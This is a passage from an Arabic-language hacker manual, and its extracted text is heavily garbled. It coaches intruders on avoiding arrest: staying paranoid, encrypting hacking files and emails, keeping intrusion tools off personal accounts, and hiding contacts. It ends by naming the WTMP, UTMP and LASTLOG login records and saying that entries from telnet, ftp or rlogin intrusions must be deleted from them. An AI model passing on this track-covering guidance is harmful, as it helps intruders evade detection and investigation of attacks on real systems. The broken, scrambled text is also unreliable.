‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺰوج (‬ ‫ﺘﻚ وا ﻃﻔﺎﻟﻚ )انﻛﻨ ﺖ ﻣ‬ ‫ﺰوﺟ‬


‫ﺮﺑﻤﺎ ﻻﺗﺸﻌ ﺮﺑﺎن ﻣﺎﺗﻘﻮمﺑﻪ ﻫﻮ ﺟ ﺮﯾﻤﻪ ‪..‬ﻟﻜﻦﻓﻲاﻟ ﺤﻘﯿﻘﻪ ﻫﻲ ﺟ ﺮﯾﻤﻪ !!‬
‫ﺘﻈ ﺮكانﺗﻢاﻟﻘﺒ ﺾ ﻋﻠﯿﻚ ؟!‬ ‫ﻫ ﻞﺗﻌ ﺮ ف ﻣﺎذا ﺳﯿﻨ‬
‫ﺘﻢ ﺣ ﺮﻣﺎﻧﻚ ﻣﻦﻛ ﻞاﻣﻮراﻟﻜﻮﻣﺒﯿﻮﺗ ﺮ ‪ ..‬ﻧﻈ ﺮة ﺎﻟﻨﺎساﻟﻐﯿﯿ ﺮ ﻃﺒﯿﻌﯿﻪﻟﻚ )ﻟﯿﺴ ﺖ ﻧﻈ ﺮةاﻋﺠﺎباﻧﻤﺎ ﻧﻈ ﺮة‬ ‫ﺳﯿ‬
‫ﺘﺴﺪﻋﻰ ﻋﻨﺪ ﺣﺼﻮ لاي ﻣﺸﺎﻛ ﻞا ﺧ ﺮى ﻣﻦ ﻫﺬااﻟﻨﻮ ع‬ ‫ﺘ ﺤﻘﻬﺎ ‪ ..‬ﺳ‬‫ﺘﻲﺗﺴ‬ ‫ﺧﻮ ف ( ‪..‬ﻟﻦﺗ ﺤﻈﻰﺑﻔ ﺮ صاﻟﻌﻤ ﻞ ﺎﻟ‬
‫‪..‬ﻟﺬاﻓﺎن ﻣﻌﻈﻢ ﻣﻦ ﯾﺴﻘﻄﻮن ﻻ ﯾﻘﻮﻣﻮنﺛﺎﻧﻲاﺑﺪا !!‬

‫ﻟﺬاﻓﺎ ﺻﺒﺢ ﺣﺬرا ﺟﺪا و ﺷﻜﺎﻛﺎ ‪..‬اﻣﻦ ﻧﻔﺴﻚ‬


‫ﺘﯿﺎ ﻃﺎ ت‬
‫ﺎ ﺧﺬ ﺟﻤﯿﻊاﻻ ﺣ‬
‫ﺘﻢﺑﻤﺎﻗﺪﯾﻘﻮﻟﻪاﻟﻜﺜﯿ ﺮون ﻋﻨﻚﺑﺎﻧﻚ ﺧﻮا فاو ﻣﺎ ﺷﺎﺑﻪ‬ ‫ﻻﺗﻬ‬
‫ﺘﻪﺗﺎﻓﻬﻪ‬‫ﺘﻢﺑﺎي ﻣﻠ ﻒ ‪ log‬ﻣﻬﻤﺎﻛﺎﻧ ﺖﻗﯿﻤ‬ ‫ﺎﻫ‬
‫ﺘﺼﺒﺢ ‪ hacker‬ﻋﻠﯿﻚانﺗﻘﻮمﺑﻌﻤﻠﻚ ‪ ..‬ﺳﻠﯿﻤﺎ ‪% ١٠٠‬‬ ‫ﻟ‬

‫ﻛﯿ ﻒﺗﺼﺒﺢ " ‪ " Paranoid‬؟‬


‫*********************‬
‫ﺘﻨﺎ ع و ﺣﺪه‬
‫ﻗ‬‫ﺘﻨﻌ ﺖﺑﻪاﻧ ﺖﺑﺎﻟﻔﻌ ﻞا ﺻﺒ ﺤ ﺖ ﻫﺬااﻟﺸﺨ ﺺ " ‪" Paranoid‬ﻟﻜﻦاﻻ‬ ‫ﻗ‬‫ﺎذاﻛﻨ ﺖﻗ ﺮأ ت ﻣﺎ ﺳﺒ ﻖ وا‬
‫ﺘﻮﺗ ﺮ ﻣﻮﺟﻮدﯾﻦﺑﺸﻜ ﻞ‬ ‫ﺘ ﺤﻤ ﺲ و ﺣﺪه وﻟﯿﺪاﻟﻠ ﺤﻈﻪاﯾ ﻀﺎ ﻻﯾﻜﻔﻲ ‪...‬اﻧﻤﺎ ﻻﺑﺪان ﯾﻜﻮناﻟﻘﻠ ﻖ واﻟ‬ ‫ﻻ ﯾﻜﻔﻲ واﻟ‬
‫ﺘ ﺮوﻧﯿﻪ (‬‫داﺋﻢﻓﻲ ﺣﯿﺎﺗﻚ ) ﺎﻻﻟﻜ‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊاﻻ ﺧ ﺮﯾﻦ‬
‫ﺎذاﻛﻨ ﺖﻓﻌﻼﺗ ﺮﯾﺪانﺗﻜﻮن ﻫﻜ ﺮ ﺣﻘﯿﻘﻲ ‪ ...‬ﻻﺑﺪانﺗﻌ ﺮ فﻟﻤﻦﺗﻘﻮ ل ﻫﺬهاﻟ ﺤﻘﯿﻘﻪ وﻛﯿ ﻒﺗ‬
‫ﻗﺐ داﺋﻤﺎ واﻧﻪ ﻫﻨﺎكﻛﺎﻣﯿ ﺮا ﺧﻔﯿﻪ وراك داﺋﻤﺎ ‪..‬ﻓﺎ ﺣﺬرﻓﻲﻛﻼﻣﻚ ﻋﻠﻰاﻟﻬﺎﺗ ﻒ ﻻﻧﻪ‬ ‫‪..‬اﻋﻤ ﻞ ﺣﺴﺎباﻧﻚ ﻣ ﺮا‬
‫ﻗﻊ (‬‫ﺘﻮ‬‫ﺘ ﺮوﻧﻲ )ﻻﺑﺪانﺗﻌﻤ ﻞ ﺣﺴﺎباﻟﻐﯿ ﺮاﻟﻤ‬ ‫ﺘﻰﺑ ﺮﯾﺪﯾﻚاﻟﺸﺨﺼﻲ واﻻﻟﻜ‬ ‫ﻗﺐ ‪..‬او ﺣ‬ ‫ﻗﺪ ﯾﻜﻮن ﻣ ﺮا‬

‫ﺎذا ﻣﺎﻗﺪﺬﻛﺮﺗﻪ ﻻ ﯾﻬﻤﻚ واﻧﻚاﻧﺴﺎن ﻏﯿ ﺮ ﻣﺒﺎﻟﻲ ‪ ..‬دﻋﻨﻲاﺳﺄﻟﻚ ﻫﺬهاﻻﺳﺌﻠﻪ ؟‬


‫ﻫ ﻞﺗ ﺮﯾﺪان ﯾ ﺮاكاﻻ ﺧ ﺮﯾﻦ ﻣﺠ ﺮم ؟ ﻫ ﻞﺗ ﺮﯾﺪانﺗ ﺮىاﻟ ﺤﺰن واﻟﺪﻣﻮ ع ﻋﻠﻰ وﺟﻪاﻫﻠﻚ ؟ﻫ ﻞﺗ ﺮﯾﺪانﺗ ﺤﺴ ﺮ‬
‫ﻗﻠﻮﺑﻬﻢ ﻋﻠﯿﻚ ؟!‬
‫ﺘﻚ ؟‬‫ﺘﻚ ؟ ﺻ ﺤﺒ‬ ‫ﻗﺎﺋﻚ ؟ ﺧﻄﯿﺒ‬‫ﻫ ﻞﺗ ﺮﯾﺪانﺗﻔﻘﺪا ﺻﺪ‬
‫ﺗﺬﻛ ﺮاناﻟ ﻀ ﺮرﻟﻦ ﯾﻌﻮد ﻋﻠﯿﻚﻓﻘﻂاﻧﻤﺎ ﺳﯿﻌﻮد ﻋﻠﻰﻛ ﻞ ﻣﻦﺗﻌ ﺮﻓﻪ‬

‫ﺘﻚاﻟﺠﺪﯾﺪه ؟!‬ ‫‪-‬ﻮﻛﯿ ﻒﺗ ﺤﺎﻓﻆ ﻋﻠﻰاﺳﻠﻮﺑﻚ ﺎﻟﺠﺪﯾﺪاو ﺷﺨﺼﯿ‬


‫******************************************‬
‫ﺘﻰاﻻن وﻗ ﺮر تانﺗﻜﻮناﻧﺴﺎن ﺣ ﺮﯾ ﺺ ﺟﺪا ‪ ..‬ﻻﺑﺪانﺗﺒﻘﻰ ﻫﻜﺬا ﻃﻮا ل‬ ‫ﺘﻮﻋﺒ ﺖ ﻣﺎذﻛ ﺮ ﺣ‬ ‫ﺑﻤﺎ ﺎﻧﻚﻗﺪاﺳ‬
‫ﻗﺖ‬ ‫اﻟﻮ‬
‫ﺘﯿﺎ ﻃﺎ تاﻻﻣﻨﯿﻪﻗﺪﺗﻐﯿ ﺮ ﺣﯿﺎﺗﻚﺑﺎﻛﻤﻠﻬﺎ ؟!!!!‬
‫ﻮﺗﺬﻛ ﺮ ﻫﺬهاﻟﻜﻠﻤﺎ ت ‪:‬ﻟ ﺤﻈﺔﻛﺴ ﻞ وا ﺣﺪهﻓﻲاﺗﺨﺎذاﻻ ﺣ‬
‫ﺪاﺋﻤﺎﺗﺬﻛ ﺮاﻟﺪاﻓﻊ‬

‫‪-‬ﺎﻟﺠﺰ ءاﻟﺜﺎﻟﺚ‪:‬‬
‫=========‬
‫‪-‬ﺗﻤﻬﯿﺪ‬
‫******‬
‫ﺘﺮ ق‬
‫ﺘﻰﻟﻮﻛﻨ ﺖ ﻣﺨ‬
‫ﺘ ﺮا ق ‪ ..‬ﺣ‬
‫ﺘﯿﻌﺎﺑﻬﺎ ﺟﯿﺪاﻗﺒ ﻞ ﻣﻤﺎرﺳﺔاي ﻋﻤﻠﯿﺔا ﺧ‬‫ﯾﺠﺐ ﻣﻌ ﺮﻓﺔﻫﺬهاﻻﻣﻮراﻟﻘﺎدﻣﻪ واﺳ‬
‫ﺘﻮﻋﺐاﻻﻓﻜﺎر ﺎﻟﻘﺎدﻣﻪ‬
‫ﺘﻤ ﺮس ﻻﺑﺪانﺗﺴ‬ ‫ﻣ‬

‫‪٤٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪-‬ﺎﻣﻦ ﻧﻔﺴﻚ ‪:‬‬


‫***********‬
‫ﺘ ﺮوﻧﯿﻪ ؟‬
‫‪-‬ﻣﺎذاﻟﻮﻗ ﺮأا ل ‪ SysAdmin‬ﺮﺳﺎﺋﻠﻚ ﺎﻟﺒ ﺮﯾﺪﯾﻪاﻻﻟﻜ‬
‫ﻗﺒﻪ ﻣﻦﻗﺒ ﻞاﻟﺸ ﺮ ﻃﻪ ؟‬‫‪ -‬ﻣﺎذاﻟﻮﻛﺎﻧ ﺖاﺗﺼﺎﻻﺗﻚاﻟﻬﺎﺗﻔﯿﻪ ﻣﺴﺠﻠﻪ و ﻣ ﺮا‬
‫‪ -‬ﻣﺎذاﻟﻮﺗﻢ ﺿﺒﻂاﻟﻜﻮﻣﺒﯿﻮﺗ ﺮاﻟﺸﺨﺼﻲ واﻟﺴﯿﻄ ﺮه ﻋﻠﻰﻛ ﻞ ﻣﻌﻠﻮﻣﺎﺗﻚ ؟‬

‫ﺎذاﻛﻨ ﺖ ﻻﺗﻘﻮمﺑﻌﻤ ﻞاياﺗﺼﺎﻻ ت ﻫﺎﺗﻔﯿﻪ ﻣﻊاي ﺷﺨ ﺺ ﻣﻦاﻟﻬﺎﻛ ﺮزاواﻟﻜ ﺮاﻛ ﺮز ‪ ..‬ﻮﻻﺗﺒﻌﺚاياﯾﻤﯿﻼ ت‬


‫ﺘﻠﻚاي ﻣﻌﻠﻮﻣﺎ تاﻣﻨﯿﻪ و ﺣﺴﺎﺳﻪ ﻋﻠﻰ ﺟﻬﺎزكﻓﻬﺬاﺑﺒﺴﺎ ﻃﻪﻻ ﯾﺸﻜ ﻞاي ﺧﻮ ف‬ ‫ﻓﯿﻪ ﻣﻌﻠﻮﻣﺎ ت ﻣﺸﺒﻮﻫﻪ وﻻﺗﻤ‬
‫ﺘ ﺮ قاو)= ‪hacker‬‬ ‫ﻻﻧﻪﺑﺒﺴﺎ ﻃﻪاﯾ ﻀﺎاﻧ ﺖﻟﺴ ﺖ ﻣﺨ‬
‫ﺘﺒﺎد ل ﺎﻻ ﺧﺒﺎر واﻻﻓﻜﺎر ‪..‬‬
‫ﺘﻤﯿﻦﺑﻬﺬااﻟﻤﺠﺎ ل ‪..‬ﻟ‬
‫ﻗﺎﺋﻚاﻟﻤﻬ‬
‫ﻻﻧﻪ ﻻﺑﺪ ﻣﻦ وﺟﻮداﺗﺼﺎ لﺑﯿﻨﻚ وﺑﯿﻦاﺻﺪ‬
‫ﺘ ﺮا ق ﺎوﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻲﺗﻌﺒ ﺮ ﻣﺪﯾﻨﻪﻟﻚﻓﻲ ﺣﺎﻟﺔ‬ ‫ﺘﻠﻚﺑﻌ ﺾاﻟﻤﻠﻔﺎ تاﻟﻼزﻣﻪﻟﻼ ﺧ‬ ‫ﻛﻤﺎاﻧﻪ ﻻﺑﺪ واﻧﻚﺗﻤ‬
‫ﺣﺪو ث رﺻﺪﻟﺠﻬﺎزك )ﻛﺒﺴﻪ (‬
‫‪<--‬‬
‫>‪--‬‬

‫ﺘﺸﻔﯿ ﺮﻛ ﻞ ﻣﺎﺗﻤﻠﻜﻪ ﻣﻦ ﻣﻌﻠﻮﻣﺎ ت ﺣﺴﺎﺳﻪ ‪sensitive data‬‬ ‫ﻗﻢﺑ‬


‫ﺘﻲ‬‫ﺘ ﺮﻧ ﺖ ‪ ..‬و ﻫﺬهﻗﺎﺋﻤﻪﺑﺎﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞ واﻟ‬
‫ﺘﺨﺪامﺑﻌ ﺾاﻟﺒ ﺮاﻣ ﺞاﻟﻤﻮﺟﻮده ﻣﺠﺎﻧﺎ ﻋﻠﻰاﻻﻧ‬ ‫ﯾﻤﻜﻨﻚ ذﻟﻚﺑﺎﺳ‬
‫ﺘﯿﺎراﻟﻬﺎﻛ ﺮزاﻻو ل ‪:‬‬
‫ﺘﺒ ﺮا ﺧ‬
‫ﺗﻌ‬
‫ﺘﺨﺪﻣﯿﻦ ‪ MsDos‬ﺎﻟﯿﻜﻢ ‪ SFS v.17‬ﺎو‪SecureDrive 1.4b‬‬ ‫‪-‬ﻟﻤﺴ‬
‫ﺘﺨﺪام‬‫ﺘﺸﻐﯿ ﻞ ﻏﯿ ﺮ ﺷﺎﺋﻌﺔاﻻﺳ‬ ‫ﺘﺨﺪﻣﯿﻦ ﻧﻈﺎم *‪ Amiga‬ﺎﻟﯿﻜﻢ * ( ‪ EnigmaII v1.5‬ﺎ ﺣﺪىاﻧﻈﻤﺔاﻟ‬ ‫‪-‬ﻟﻤﺴ‬
‫ﺧﺼﻮ ﺻﺎﻓﻲ ﻋﺎﻟﻤﻨﺎاﻟﻌ ﺮﺑﻲ (‬
‫ﺘﺨﺪﻣﯿﻦاﻧﻈﻤﺔا ل ‪ Unix‬ﺎﻟﯿﻜﻢ‪CFS v1.33‬‬ ‫‪-‬ﻟﻤﺴ‬

‫ﺘﺸﻔﯿ ﺮاﻟﻤﻠﻔﺎ تﺑﺸﻜ ﻞﻓ ﺮدي ) ﻣﻠ ﻒﺑﻤﻠ ﻒ (اﻟﯿﻜﻢ ﻫﺬهاﻟﺒ ﺮاﻣ ﺞ )اﻻﻛﺜ ﺮ ﺷﻬ ﺮه واﻻ ﺣﺴﻦادا ء ( ‪:‬‬
‫ﻟ‬

‫‪- Triple DES‬‬


‫‪- IDEA‬‬
‫)‪- Blowfish (32 rounds‬‬
‫‪- file2file‬‬

‫ﺘﺸﻔﯿ ﺮاﻻﯾﻤﯿﻼ ت ‪:‬‬


‫ﻟ‬
‫‪- PGP v2.6.x‬‬

‫ﻗﺐ (‬ ‫ﯾﻤﻜﻨﻚاﯾ ﻀﺎﺗﺸﻔﯿ ﺮ ﻋﻤﻠﯿﺔاﺗﺼﺎﻟﻚ ب ( ‪ Unix System‬ﻋﻠﻰاﺳﺎس ﺎﻧﻪ ﻣﻤﻜﻦانﺗﻜﻮن ﻣ ﺮا‬


‫ﺘﺨﺪام ‪:‬‬
‫ﻮ ذﻟﻚﺑﺎﺳ‬
‫ﺘﻰاﻻن‬ ‫‪- SSH‬ﺎﻻﻣﻦ ﺣ‬
‫‪- DES Login‬‬
‫ﺘﺨﻤﯿﻦ ‪ ..‬ﻏﯿ ﺮ ﻣﻨﻄﻘﯿﻪ ‪ ..‬ﻏﯿ ﺮ ﺷﺎﺋﻌﻪ ‪..‬ﻻﺗﻮﺟﺪﻓﻲاﻟﻘﻮاﻣﯿ ﺲ ‪..‬ﻟﻜﻦﻓﻲ ﻧﻔ ﺲ‬ ‫ﺎﺟﻌ ﻞﻛﻠﻤﺎﺗﻚاﻟﺴ ﺮﯾﻪ ﺻﻌﺒﺔاﻟ‬
‫ﺘﺬﻛ ﺮﻫﺎ داﺋﻤﺎ‬ ‫ﻗ ﺖ ﻻﺑﺪانﺗ‬‫اﻟﻮ‬
‫ﺘ ﺮاك ﯾﻄﻠﺐ‬‫ﺘﻠﻜﻪ ‪ ..‬ﺎﺟﻌﻠﻬﺎاﻛﺒ ﺮ ﻋﺪد ﻣﻤﻜﻦ ﻣﻦاﻻ ﺣ ﺮ ف ) ﯾﻌﻨﻲ ﻋﺎدة ﻋﻨﺪ ﻋﻤ ﻞاياﺷ‬ ‫ﺘﻤ‬‫ﺘﺎبﺗ‬ ‫ﺘ ﺮﻫﺎ ﻣﻦﻛ‬
‫ﺎﺧ‬
‫ﺘ ﺮا ل ‪ ٨‬ﺣ ﺮو ف‬
‫ﺘﻜﻮن ﻣﻦ ‪٨- ٤‬ا ﺣ ﺮ ف (ﻓﺎ ﺧ‬ ‫ﻣﻨﻚﻛﻠﻤﻪ ﺳ ﺮﯾﻪﺗ‬

‫‪٤٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻰﺑ ﺮﻣﻮزﺗﻔﻬﻤﻬﺎاﻧ ﺖ‬ ‫ﺘﯿﺎدي ‪..‬اﻧﻤﺎ ﯾﻤﻜﻨﻚﺑﺎنﺗﺸﻔ ﺮﻫﺎ ) ﺣ‬ ‫ﻗﺎم ﻫﻮاﺗ ﻒاﺻ ﺤﺎﺑﻚاﻟﻬﺎﻛ ﺮزﺑﺸﻜ ﻞاﻋ‬ ‫ﻻﺗ ﺤﻔﻆار‬
‫ﻓﻘﻂ ( واﺗﺼ ﻞﺑﻬﻢ ﻣﻦ ﻫﻮاﺗ ﻒاﻟﺸﺎر عاو ﻣﻦاﻟﻌﻤ ﻞ ‪..‬‬
‫ﺘﻌﻠ ﻖﺑﻬﺬهاﻻﻣﻮر !!‬ ‫ﺘﻌﻤ ﻖ ﺟﺪاﻓﻲاﻟﻬﺎﻛﯿﻨ ﺞﻓﻼﺑﺪ ﻣﻦﺗﺸﻔﯿ ﺮﻛ ﻞ ﺷﺊ ﯾ‬ ‫ﺎذااﻧ ﺖﺑﺎﻟﻔﻌ ﻞ ﻣ‬
‫ﺘﻰاذا ﺧﺴ ﺮ ت‬ ‫ﺘﯿﺎ ﻃﯿﻪ ﻣﻦ ﻣﻌﻠﻮﻣﺎﺗﻚ ﻋﻠﻰ ‪ CD‬ﺎو ‪ HD‬ﻮﺑﺎﻟﻄﺒﻊﺗﻜﻮن ﻣﺸﻔ ﺮه ﺣ‬ ‫ﺎ ﺣﻔﻆ داﺋﻤﺎ ﻧﺴﺨﻪا ﺣ‬
‫ﺘﯿﺎ ﻃﯿﻪ‬‫اﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻮﺟﻮده ﻋﻠﻰ ﺟﻬﺎزك ﯾﻜﻮنﻟﺪﯾﻚ ﻧﺴ ﺦا ﺣ‬
‫ﺘﺎﺟﻬﺎ ‪ ..‬وانﻛﺎنﻟﺪﯾﻚ ‪ document files‬ﺎو ﻣﻠﻔﺎ ت ﻣﻄﺒﻮﻋﻪ و ﻻﺗ ﺮﯾﺪﻫﺎ ﻣ ﺮة‬ ‫ﺘﻔﻆﺑﻤﻠﻔﺎ ت ﻻﺗ ﺤ‬ ‫ﻻﺗ ﺤ‬
‫ﺘﯿﺎدﯾﻪاوانارد ت‬ ‫ﻗﻬﺎﻓﻲ ﻣﻜﺎنﺑﻌﯿﺪﻛ ﻞ ﺎﻟﺒﻌﺪ ﻋﻦاﻣﺎﻛﻦﺗﻮاﺟﺪكاﻻﻋ‬ ‫ﺘﯿﺎدﯾﺎاﻧﻤﺎا ﺣ ﺮ‬‫ا ﺧ ﺮى ﻻﺗﻘﻄﻌﻬﺎاﻋ‬
‫ﺘﻬﺎ ﻣﻦ ﺟﺪﯾﺪﺑﺎﺳﻠﻮب ﻣ ﺮﻣﺰاو ﻣﺸﻔ ﺮ ﻻﯾﻌ ﺮﻓﻪاﻻاﻧ ﺖ !!‬ ‫ﺘﺎﺑ‬
‫ﺘﻔﺎظﺑﻬﺎﻓﻌﻠﯿﻚﻛ‬ ‫اﻻ ﺣ‬

‫ﻫ ﻞﺗﻌ ﺮ فاﻧﻪ ﻣﻦاﻟﻤﻤﻜﻦان ‪:‬‬


‫=================‬
‫ﺘﺨﺪام‬‫ﺘﺴﻄﯿﻌﻮن رﺻﺪﻛ ﻞ ﺣ ﺮﻛﺎ تﺑﺎﺳ‬ ‫ﻗﺐ ﻣﻦ ‪:‬اﻟﺸ ﺮ ﻃﻪ ‪،‬اﻟﻤﺨﺎﺑ ﺮا ت ‪ ،‬ﻫﺎﻛ ﺮزا ﺧ ﺮون واﻧﻬﻢ ﯾ‬ ‫ﺗﻜﻮن ﻣ ﺮا‬
‫وﺳﺎﺋ ﻞ ﺣﺪﯾﺜﻪ ﻻﯾﻤﻜﻦﺗﺨﯿﻠﻬﺎ‬
‫ﻣﺜ ﻞ ‪:‬‬
‫ﺘﺎر‬ ‫ﺘﻄﯿﻊﺗﺼﻮﯾ ﺮك ﻋﻨﺪﺑﻌﺪ ﻣﺌﺎ تاﻻﻣ‬ ‫‪-‬ﺎﺟﻬﺰهﺗﺼﻮﯾ ﺮﺗﺴ‬
‫ﺘﺼﻨ ﺖ ﻋﻠﻰ ﻣﻜﺎﻟﻤﺎﺗﻚ‬ ‫ﺘﻚﻟﻠ‬‫‪-‬ﻧﻘﻄﺔﻟﯿﺰر ﻣﺼﻮﺑﻪ ﻧ ﺤﻮ ﻏ ﺮﻓ‬
‫ﺘﻨﺼ ﺖ ﻋﻠﻰﻟﻤﺴﺎ ت و ﺻﻮ ت ﯾﺪﯾﻚ ﻋﻠﻰا ل!! ‪keyborad‬‬ ‫ﺘ ﺮددﻟﻠ‬ ‫‪-‬ﻣﻮﺟﺎ ت ﻋﺎﻟﯿﺔاﻟ‬
‫ﻗﻮﻟﻪ ﻣﺒﺎﻟﻐﻪ‬
‫ﺘﻠ ﻒﺑﺎﻟﻄﺒﻊﻫﺬهاﻻﻣﻜﺎﻧﯿﺎ ت ﻣﻦ ﻣﻜﺎن ﻻ ﺧ ﺮ و ﻣﻦ دوﻟﻪاﻟﻰا ﺧ ﺮى ‪ ..‬و ﯾ ﺮىاﻟﺒﻌ ﺾاﻧﻪﻓﯿﻤﺎا‬ ‫ﺗﺨ‬
‫ﺘﻌﺪ ﻣﻦاﻻن !!!‬ ‫ﺘﻘﺒ ﻞ !!ﻓﻠﻤﺎذا ﻻﺗﺴ‬‫!!!ﻟﻜﻦاﻧ ﺖ ﻻﺗﻌ ﺮ ف ﻣﺎذا ﯾﺨﺒﺊﻟﻚاﻟﻤﺴ‬
‫ﺘﻨﺼ ﺖﻫﺬه ‪ ...‬و‬ ‫ﺘﻮﻓ ﺮﻓﯿﻬﺎاﺟﻬﺰةاﻟ‬ ‫ﻛﻤﺎاﻧﻪ ﻫﻨﺎكاﻟﻜﺜﯿﯿ ﺮ ﻣﻦا ﺧﻮاﻧﻨﺎاﻟﻌ ﺮبﻓﻲ دو ل ﺎﻟﺨﺎرجاﻟﺬيﺑﺎﻟﻔﻌ ﻞﺗ‬
‫ﺘﯿﺎ ﻃﯿﺎ و ﺣ ﺮﻛﺎﺗﻚﺗ ﺤﺴﺒﻬﺎﺑﺸﻜ ﻞ‬
‫ﺘﺎر ﻋﺪوكﻓﯿﻚ "ﻓﻜﻠﻤﺎﻛﻨ ﺖا ﺣ‬ ‫ﻋﻠﻰ راياﻟﻤﺜ ﻞاﻟﻤﺼ ﺮي "اﻣﺸﻲ ﻋﺪ ل ﯾ ﺤ‬
‫ﺘﻚﻗﻠﯿﻠﻪ ﺟﺪا‬ ‫ﺻ ﺤﯿﺢ !!!ﻓﻔ ﺮ ص ﺎ ﻃﺎ ﺣ‬

‫ﺘ ﺮاﻛﺎ تاﻟﺸﺨﺼﯿﻪ ‪:‬‬‫ﺣﺴﺎﺑﺎﺗﻚ واﺷ‬


‫===================‬
‫ﺘﺎﻟﻲ ‪:‬‬‫ﻫﻨﺎ ﺳﺄﺗﻜﻠﻢ ﻋﻦ ﺣﺴﺎﺑﺎﺗﻚاﻟﺸﺨﺼﯿﻪ ﺳﻮا ءﻛﺎﻧ ﺖﻓﻲ ﺎﻟﻌﻤ ﻞ\اﻟﻤﺪرﺳﻪ\اﻟﺠﺎﻣﻌﻪ\ايﻛﺎنﻓﻌﻠﯿﻚﺑﺎﻟ‬
‫ﺘﻲﻓﯿﻬﺎ ﯾﻜﻮناﺳﻤﻚاﻟ ﺤﻘﯿﻘﻲ و‬ ‫ﺘﻚاﻟﺸﺨﺼﯿﻪاﻟ‬ ‫‪-‬ﺎﺑﺪا ﻻﺗﻘﻮمﺑﺎي ﻋﻤ ﻞ ﻏﯿﯿ ﺮﻗﺎﻧﻮﻧﻲ ‪..‬او ﻣﺸﺒﻮهﺑ ﺤﺴﺎﺑ‬
‫ﺘﻚ وﺗﻔﺼﯿﻼ تﻛﺎﻣﻠﻪ ﻋﻨﻚ‬ ‫ﻫﻮﯾ‬
‫ﻗﻪﺑﻮاﺳﻄﺔا ل ‪telnet‬‬ ‫ﺘ ﺮا‬
‫ﻗﻊﻗﺪﺗﻢا ﺧ‬ ‫ﺘﺼ ﻞﺑﻤﻮ‬ ‫‪-‬ﻋﻤ ﺮك ﻣﺎﺗ ﺤﺎو لانﺗ‬
‫ﻗﻊاﻣﻨﻲ ‪ security‬ﻣﻦ دون ﺧﻮ ف ‪..‬‬ ‫ﺘ ﺮاكﺑ ﺤﺴﺎﺑﻚاﻟﺨﺎ صﻓﻲﻗﺎﺋﻤﺔاﻟﺒ ﺮﯾﺪ ﻻي ﻣﻮ‬ ‫‪-‬ﯾﻤﻜﻨﻚاﻻﺷ‬
‫ﺘﻢ ﻣﺴ ﺤﻬﺎﻓﻮرا‬‫ﺘ ﺺﺑﺎﻟﻬﺎﻛﯿﻨ ﺞ ﻣﻦ ﻣﻠﻔﺎ ت ﻻﺑﺪانﺗﺸﻔ ﺮاواﻧﻬﺎ ﯾ‬ ‫‪-‬ﻟﻜﻦﻛ ﻞ ﻣﻮ ﻫﻮ ﻣﺨ‬
‫ﺘ ﺮا ق ﻋﻠﻰاﻟﻬﺎردﯾﺴﻚﻓﻲ ﺣﺴﺎﺑﻚاﻟﺸﺨﺼﻲ‬ ‫‪-‬اﺑﺪا ﻻﺗ ﺤﻔﻆايﺑ ﺮاﻣ ﺞ وادوا تاﻻ ﺧ‬
‫‪-‬ﺑ ﺮﯾﺪكاﻟ ﺤﻘﯿﻘﻲﻻﺗﻌﻄﯿﻪاﻻﻟﻤﻦﺗﺜ ﻖﻓﯿﻪﺛﻘﻪ ﻋﻤﯿﺎ ء !!!!‬
‫ﺘﻤﺎمﺑﻌﻜ ﺲاﻟﺴﻜﯿﻮرﺗﻲﻫﻮاﻟﻤﺸﻜﻠﻪ == >ﺎﻟﻬﺎﻛﯿﻨ ﺞ‬ ‫ﺘﻤﺎﻣﻚﺑﺎﻟﺴﻜﯿﻮرﺗﻲ ﻻ ﯾﺠﻌﻠﻚ ﻣﺸﺒﻮﻫﺎ ‪..‬اﻧﻤﺎاﻻﻫ‬ ‫‪-‬ﺎﻫ‬

‫‪<----‬‬
‫ﻣﻠﻔﺎ تاﻟﻠﻮ ق ‪LoGS :‬‬
‫============‬
‫ﻫﻨﺎك ‪ ٣‬ﻣﻠﻔﺎ ت ﻣﻬﻤﻪ ﺟﺪا ‪:‬‬
‫ﺘﺴﺠﯿ ﻞ ﻋﻨﺪاﻟﺪ ﺧﻮ ل واﻟﺨ ﺮوج ) ‪( log on/off - log in/logout + tty + host‬‬‫‪- WTMP‬ﻟﻠ‬

‫‪٥٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻮاﺟﺪﯾﻦاوﻧﻼﯾﻦ ﺣﺎﻟﯿﺎ !‬‫‪- UTMP‬ﻟﻠﻤ‬


‫‪- LASTLOG‬ﺗﺴﺠﯿ ﻞ ﻣﻦاﯾﻦ ﺟﺎ ء تﻫﺬه ‪logins‬‬

‫ﺘﻔﺎ ﺿﻪ وﺗﻌﻤ ﻖﻓﯿﻤﺎﺑﻌﺪ )ﻓﻲ ﺟﺰ ءا ﺧ ﺮ ﻣﻦ ﻧﻔ ﺲاﻟﻤﻮ ﺿﻮ ع (‬


‫ﺘﻜﻠﻢ ﻋﻨﻬﻢﺑﺎﺳ‬
‫** ﺳﻨ‬

‫ﺘﻢﺗﺴﺠﯿﻠﻬﺎﻓﻲﻫﺬهاﻟﻤﻠﻔﺎ ت ‪ ..‬ﻻﺑﺪ ﺣﺬ ف د ﺧﻮﻟﻚ‬


‫ﻛ ﻞ ﻋﻤﻠﯿﺔ د ﺧﻮ لﺑﻮاﺳﻄﺔا ل ‪ telnet , ftp , rlogin‬ﯾ‬
‫ﺘﻢ ﻣﻌ ﺮﻓﺔاﻻﺗﻲ ‪:‬‬
‫ﻣﻦﻫﺬهاﻟﻤﻠﻔﺎ ت واﻻ ﺳﯿ‬
‫ﺘ ﺮا ق !!‬
‫‪ -‬ﻣﺎذاﻗﻤ ﺖﺑﺎﻻ ﺧ‬
‫‪-‬ﻣﻦاي ﻣﻜﺎناﻧ ﺖﻗﺎدم‬
